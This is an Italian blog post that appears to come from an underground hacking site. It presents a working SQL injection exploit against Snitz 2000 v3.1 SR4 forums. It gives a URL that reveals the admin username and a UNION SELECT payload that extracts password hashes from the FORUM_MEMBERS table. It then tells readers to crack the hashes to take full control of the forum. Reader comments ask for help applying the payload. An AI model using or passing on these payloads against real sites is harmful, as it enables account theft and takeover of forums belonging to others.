Exploit Snitz 2000 Version 3.1 SR4 Remote SQL Injection Vulnerability

Un exploit powered by XORON, una Remote SQL Injection Vulnerability per i Forum SNITZ 2000 v3.1 SR4.

Il funzionamento è semplcissimo, la vulnerabilità è nella pagina pop_profile.asp:

trovare l’username dell’Admin:

aggiungere all’indirizzo del forum vittima pop_profile.asp?mode=display&id=1

esempio: http://forumvittima.it/pop_profile.asp?mode=display&id=1

vi comparirà il nick dell’Admin;

trovare la password dell’Admin:

aggiungere all’indirizzo del forum vittima pop_profile.asp?

mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9

,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS

Ecco che compare l’hash MD5 della password, adesso basta crackarla con il cracker di milw0rm.
Voilà avete il pieno controllo del Forum!

Bye Bye😉

4 Responses to “Exploit Snitz 2000 Version 3.1 SR4 Remote SQL Injection Vulnerability”


  1. 1 ferruccio 25, gennaio, 2008 alle 2:18 pm

    e sapessi quanti forum ancora in piedi con questa piattaforma bah

  2. 2 kaio 29, gennaio, 2008 alle 6:02 pm

    ma la seconda stringa dove và scritta di preciso???
    potresti fare un esempio come quello della prima stringa???
    grazie in anticipo:::!!!!

  3. 3 Francesca 20, marzo, 2008 alle 8:56 am

    Ciao,
    ho provato il procedimento che hai descritto, la passwd sono riuscita a recuperarla, lo username no.. e mi trovo tra 2 fuochi, il committente che non sa che cosa sia una passwd e il vecchio webmaster che per vendetta non me la vuole dare😦

    Qualche consiglio?

    Tks

  4. 4 proximus 17, aprile, 2008 alle 8:24 pm

    quando metto la seconda stringa mi dice invalid ID.vuol dire che hanno fixato il bug in qualche modo?


Comments are currently closed.



Feeds RSS web, e-mail e mobile.

Creative Commons License
UnderGround0 World è pubblicato sotto una Licenza Creative Commons.
La riproduzione di tutto o parte dei contenuti di questo sito potranno avvenire solo senza alcun scopo di lucro e dovranno riportare la fonte originaria ed un link a UnderGround0 World o quella degli autori orginari. I trasgressori saranno perseguiti secondo le norme:Art. 173ter e Art. 174ter



Il Gioco Della Vita



DISCLAIMER
Le informazioni da me divulgate sono da ritenersi a puro scopo informativo e di studio. Non mi assumo nessuna responsabilità riguardante l'uso improprio o illecito e di tutti i danni o perdite di guadagni che ne possano derivare.

Contatore Visite

  • 1,049,926 visite




















My blog is worth $923,387.24.
How much is your blog worth?



Berluscounter!

NoCocozza!

luglio: 2007
L M M G V S D
« Giu   Set »
 1
2345678
9101112131415
16171819202122
23242526272829
3031